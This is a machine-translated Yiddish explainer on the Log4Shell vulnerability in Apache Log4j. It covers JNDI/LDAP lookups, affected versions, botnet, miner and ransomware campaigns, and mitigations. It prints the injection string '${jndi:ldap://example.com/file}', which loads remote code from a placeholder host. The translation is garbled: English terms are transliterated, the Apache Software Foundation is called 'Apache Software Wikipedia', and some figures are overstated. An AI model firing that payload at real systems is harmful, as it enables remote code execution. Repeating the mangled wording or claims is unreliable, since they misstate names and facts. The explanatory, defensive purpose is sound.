טיש פון קאָנטענץ[באַהאַלטן][ווייַזן]
אין שפּעט נאוועמבער 2021, מיר אַנטדעקט אַ הויפּט סאַקאָנע צו סייבערסעקוריטי. דעם גווורע וואָלט פּאַטענטשאַלי ווירקן מיליאַנז פון קאָמפּיוטער סיסטעמען ווערלדווייד.
דאָס איז אַ וועגווייַזער וועגן די וואַלנעראַביליטי פון Log4j און ווי אַ אָוווערלוקט פּלאַן פלאָ לינקס איבער 90% פון די וועלט 'ס קאָמפּיוטער באַדינונגס אָפן צו באַפאַלן.
Apache Log4j איז אַן אָפֿן-מקור ז'אבא-באזירט לאָגינג נוצן דעוועלאָפּעד דורך די אַפּאַטשי ווייכווארג וויקיפּעדיע. ערידזשנאַלי געשריבן דורך Ceki Gülcü אין 2001, עס איז איצט טייל פון אַפּאַטשי לאָגינג באַדינונגס, אַ פּרויעקט פון די אַפּאַטשי ווייכווארג וויקיפּעדיע.
קאָמפּאַניעס אַרום די וועלט נוצן די Log4j ביבליאָטעק צו געבן לאָגינג אויף זייער אַפּלאַקיישאַנז. אין פאַקט, די ז'אבא ביבליאָטעק איז אַזוי ומעטומיק, איר קענען געפֿינען עס אין אַפּלאַקיישאַנז פון אַמאַזאָן, מייקראָסאָפֿט, Google און מער.
די פּראַמאַנאַנס פון דער ביבליאָטעק מיטל אַז קיין פּאָטענציעל פלאָ אין די קאָד קען לאָזן מיליאַנז פון קאָמפּיוטערס אָופּאַנד פֿאַר כאַקינג. אויף 24 נאוועמבער 2021, א וואָלקן זיכערהייט פאָרשער ארבעטן פֿאַר אַליבאַבאַ דיסקאַווערד אַ שרעקלעך פלאָ.
די לאָג4דזש וואַלנעראַביליטי, אויך באקאנט ווי Log4Shell, איז געווען אַננאָוטיסט זינט 2013. די וואַלנעראַביליטי ערלויבט בייזע אַקטערז צו לויפן קאָד אויף אַפעקטאַד סיסטעמען פליסנדיק Log4j. עס איז געווען עפנטלעך דיסקלאָוזד אויף 9 דעצעמבער 2021
ינדאַסטרי עקספּערץ רופן די Log4Shell פלאָ גרעסטע וואַלנעראַביליטי אין פריש זכּרון.
אין דער וואָך נאָך די ארויסגעבן פון די וואַלנעראַביליטי, סייבערסעקוריטי טימז דיטעקטאַד מיליאַנז פון אנפאלן. עטלעכע ריסערטשערז אפילו באמערקט אַ קורס פון איבער הונדערט אנפאלן פּער מינוט.
ווי גייט עס אַרבעט?
צו פֿאַרשטיין וואָס Log4Shell איז אַזוי געפערלעך, מיר דאַרפֿן צו פֿאַרשטיין וואָס עס איז טויגעוודיק.
די וואַלנעראַביליטי פון Log4Shell אַלאַוז אַרביטראַריש קאָד דורכפירונג, וואָס בייסיקלי מיטל אַז אַ אַטאַקער קענען לויפן קיין באַפֿעל אָדער קאָד אויף אַ ציל מאַשין.
ווי טוט עס דערגרייכן דעם?
ערשטער, מיר דאַרפֿן צו פֿאַרשטיין וואָס די JNDI איז.
די Java נאַמינג און Directory צובינד (JNDI) איז אַ ז'אבא סערוויס וואָס אַלאַוז ז'אבא מגילה צו אַנטדעקן און זוכן דאַטן און רעסורסן דורך אַ נאָמען. די וועגווייַזער באַדינונגס זענען וויכטיק ווייַל זיי צושטעלן אַ אָרגאַניזירט גאַנג פון רעקאָרדס פֿאַר דעוועלאָפּערס צו לייכט דערמאָנען ווען קריייטינג אַפּלאַקיישאַנז.
די JNDI קענען נוצן פאַרשידן פּראָטאָקאָלס צו אַקסעס אַ זיכער וועגווייַזער. איינער פון די פּראָטאָקאָלס איז די לייטווייט Directory אַקסעס פּראָטאָקאָל, אָדער LDAP.
ווען לאָגינג אַ שטריקל, log4j פּערפאָרמז שטריקל סאַבסטיטושאַנז ווען זיי טרעפן אויסדרוקן פון די פאָרעם ${prefix:name}
.
פֿאַר בייַשפּיל, Text: ${java:version}
קען זיין לאָגד ווי טעקסט: Java ווערסיע 1.8.0_65. די טייפּס פון סאַבסטיטושאַנז זענען געוויינטלעך.
מיר קענען אויך האָבן אויסדרוקן אַזאַ ווי Text: ${jndi:ldap://example.com/file}
וואָס ניצט די JNDI סיסטעם צו לאָדן אַ Java כייפעץ פֿון אַ URL דורך די LDAP פּראָטאָקאָל.
דעם יפעקטיוולי לאָודז די דאַטן פֿון דעם URL אין די מאַשין. קיין פּאָטענציעל העקער קענען באַלעבאָס בייזע קאָד אויף אַ עפנטלעך URL און וואַרטן פֿאַר מאשינען ניצן Log4j צו קלאָץ עס.
זינט די אינהאַלט פון קלאָץ אַרטיקלען אַנטהאַלטן באַניצער-קאַנטראָולד דאַטן, כאַקערז קענען אַרייַנלייגן זייער אייגענע JNDI באַווייַזן וואָס פונט צו LDAP סערווערס וואָס זיי קאָנטראָלירן. די LDAP סערווערס קענען זיין פול פון בייזע ז'אבא אַבדזשעקץ וואָס די JNDI קענען ויספירן דורך די וואַלנעראַביליטי.
וואָס מאכט דעם ערגער איז אַז עס טוט נישט ענין אויב די אַפּלאַקיישאַן איז אַ סערווער זייַט אָדער אַ קליענט זייַט אַפּלאַקיישאַן.
ווי לאַנג ווי עס איז אַ וועג פֿאַר די לאָגער צו לייענען די בייזע קאָד פון די אַטאַקער, די אַפּלאַקיישאַן איז נאָך אָפן פֿאַר עקספּלויץ.
ווער איז אַפעקטאַד?
די וואַלנעראַביליטי אַפעקץ אַלע סיסטעמען און באַדינונגס וואָס נוצן APache Log4j, מיט ווערסיעס 2.0 ביז און אַרייַנגערעכנט 2.14.1.
עטלעכע זיכערהייט עקספּערץ רעקאָמענדירן אַז די וואַלנעראַביליטי קען ווירקן אַ נומער פון אַפּלאַקיישאַנז ניצן Java.
דער פלאָ איז געווען ערשטער דיסקאַווערד אין די מיקראָסאָפט-אָונד Minecraft ווידעא שפּיל. מייקראָסאָפֿט האט ערדזשד זייער יוזערז צו אַפּגרייד זייער Java אַדישאַן Minecraft ווייכווארג צו פאַרמייַדן קיין ריזיקירן.
Jen Easterly, דער דירעקטאָר פון סייבערסעקוריטי און ינפראַסטראַקטשער זיכערהייט אַגענטור (CISA) זאגט אַז ווענדאָרס האָבן אַ הויפּט פֿאַראַנטוואָרטלעכקייט צו פאַרמיידן סוף ניצערס פון בייזע אַקטערז וואָס נוצן דעם וואַלנעראַביליטי.
"ווענדאָרס זאָל אויך זיין קאַמיונאַקייטינג מיט זייער קאַסטאַמערז צו ענשור אַז סוף-ניצערס וויסן אַז זייער פּראָדוקט כּולל דעם וואַלנעראַביליטי און זאָל פּרייאָראַטייז ווייכווארג דערהייַנטיקונגען."
די אטאקעס האבן זיך שוין געמאלדן. Symantec, אַ פירמע וואָס פּראָווידעס סייבערסעקוריטי ווייכווארג, האט באמערקט אַ וועריד נומער פון באַפאַלן ריקוועס.
דאָ זענען עטלעכע ביישפילן פון די טייפּס פון אנפאלן וואָס ריסערטשערז האָבן דיטעקטאַד:
- באָטנעץ
באָטנעץ זענען אַ נעץ פון קאָמפּיוטערס וואָס זענען אונטער די קאָנטראָל פון אַ איין אַטאַקינג פּאַרטיי. זיי העלפֿן דורכפירן DDoS אנפאלן, גאַנווענען דאַטן און אנדערע סקאַמז. ריסערטשערז באמערקט די Muhstik botnet אין שאָל סקריפּס דאַונלאָודיד פֿון די Log4j עקספּלויט.
- קסמריג מיינער טראָדזשאַן
XMRig איז אַן אָפֿן מקור קריפּטאָקוררענסי מיינער וואָס ניצט קפּוס צו מיינינג די מאָנעראָ טאָקען. סייבער קרימינאַלס קענען ינסטאַלירן XMRig אויף מענטשן ס דעוויסעס אַזוי זיי קענען נוצן זייער פּראַסעסינג מאַכט אָן זייער וויסן.
- כאָנסאַרי ראַנסאָמוואַרע
ראַנסאָמוואַרע רעפערס צו אַ פאָרעם פון מאַלוואַרע דיזיינד צו ענקריפּט טעקעס אויף אַ קאָמפּיוטער. אַטאַקערז קענען דעריבער פאָדערן צאָלונג אין וועקסל פֿאַר געבן אַקסעס צוריק צו די ינקריפּטיד טעקעס. רעסעאַרטשערס דיסקאַווערד די כאָנסאַרי ראַנסאָמוואַרע אין Log4Shell אנפאלן. זיי צילן Windows סערווערס און נוצן די .נעט פריימווערק.
וואָס כאַפּאַנז ווייַטער?
עקספּערץ פאָרויסזאָגן עס קען נעמען חדשים אָדער טאָמער אפילו יאָרן צו גאָר פאַרריכטן די כאַאָס געפֿירט דורך די Log4J וואַלנעראַביליטי.
דער פּראָצעס ינוואַלווז אַפּדייטינג יעדער אַפעקטאַד סיסטעם מיט אַ פּאַטשט ווערסיע. אפילו אויב אַלע די סיסטעמען זענען פּאַטשט, עס איז נאָך די לומינג סאַקאָנע פון מעגלעך באַקדאָרז אַז כאַקערז קען האָבן שוין צוגעגעבן צו די פֿענצטער אַז סערווערס זענען אָפן פֿאַר באַפאַלן.
פילע סאַלושאַנז און מיטיגיישאַנז עקסיסטירן צו פאַרמייַדן אַפּלאַקיישאַנז פון זיין עקספּלויטאַד דורך דעם זשוק. די נייַע Log4j ווערסיע 2.15.0-rc1 טשיינדזשד פאַרשידן סעטטינגס צו פאַרמינערן דעם וואַלנעראַביליטי.
אַלע פֿעיִקייטן ניצן JNDI וועט זיין פאַרקריפּלט דורך פעליקייַט און ווייַט לוקאַפּס זענען אויך לימיטעד. דיסייבלינג די לוקאַפּ שטריך אויף דיין Log4j סעטאַפּ וועט העלפֿן פאַרמינערן די ריזיקירן פון מעגלעך עקספּלויץ.
אַרויס Log4j, עס איז נאָך די נויט פֿאַר אַ ברייטערער פּלאַן צו פאַרמייַדן עפֿענען-מקור עקספּלויץ.
פריער מאי, די ווייסע הויז באפרייט אַן יגזעקיאַטיוו סדר וואָס אַימעד צו פֿאַרבעסערן די נאציאנאלע סייבערסעקוריטי. עס ינקלודעד אַ טנייַ פֿאַר אַ ווייכווארג רעכענונג פון מאַטעריאַלס (SBOM) וואָס איז געווען יסענשאַלי אַ פאָרמאַל דאָקומענט וואָס קאַנטיינד אַ רשימה פון יעדער נומער דארף צו בויען די אַפּלאַקיישאַן.
דאָס כולל פּאַרץ אַזאַ ווי די עפענען מקור פּאַקידזשיז, דיפּענדאַנסיז און אַפּיס געניצט פֿאַר אַנטוויקלונג. כאָטש דער געדאַנק פון SBOMs איז נוציק פֿאַר דורכזעיקייַט, וועט דאָס טאַקע העלפֿן די קאַנסומער?
אַפּגריידינג דיפּענדאַנסיז קען זיין צו פיל פון אַ כאַסאַל. קאָמפּאַניעס קענען נאָר קלייַבן צו צאָלן קיין פינעס אלא ווי ריזיקירן וויסט עקסטרע צייט צו געפֿינען אָלטערנאַטיוו פּאַקאַדזשאַז. טאָמער די SBOMs וועט נאָר זיין נוציק אויב זייער פאַרנעם איז באגרענעצט ווייַטער.
סאָף
די Log4j אַרויסגעבן איז מער ווי בלויז אַ טעכניש פּראָבלעם פֿאַר אָרגאַנאַזיישאַנז.
ביזנעס פירער מוזן זיין אַווער פון פּאָטענציעל ריסקס וואָס קען פּאַסירן ווען זייער סערווערס, פּראָדוקטן אָדער באַדינונגס פאַרלאָזנ זיך אויף קאָד וואָס זיי טאָן ניט האַלטן.
פאַרלאָזנ אויף אָפֿן-מקור און דריט פּאַרטיי אַפּלאַקיישאַנז שטענדיק קומט מיט עטלעכע ריזיקירן. קאָמפּאַניעס זאָל באַטראַכטן ארבעטן אויס ריזיקירן מיטיגיישאַן סטראַטעגיעס איידער נייַע טרעץ קומען צו ליכט.
פיל פון די וועב רילייז אויף אָפֿן-מקור ווייכווארג מיינטיינד דורך טויזנטער פון וואַלאַנטירז ווערלדווייד.
אויב מיר ווילן צו האַלטן די וועב אַ זיכער אָרט, גאַווערמאַנץ און קאָרפּעריישאַנז זאָל ינוועסטירן אין פאַנדינג אָפֿן מקור השתדלות און סייבערסעקוריטי יידזשאַנסיז אַזאַ ווי סיסאַ.
לאָזן אַ ענטפֿערן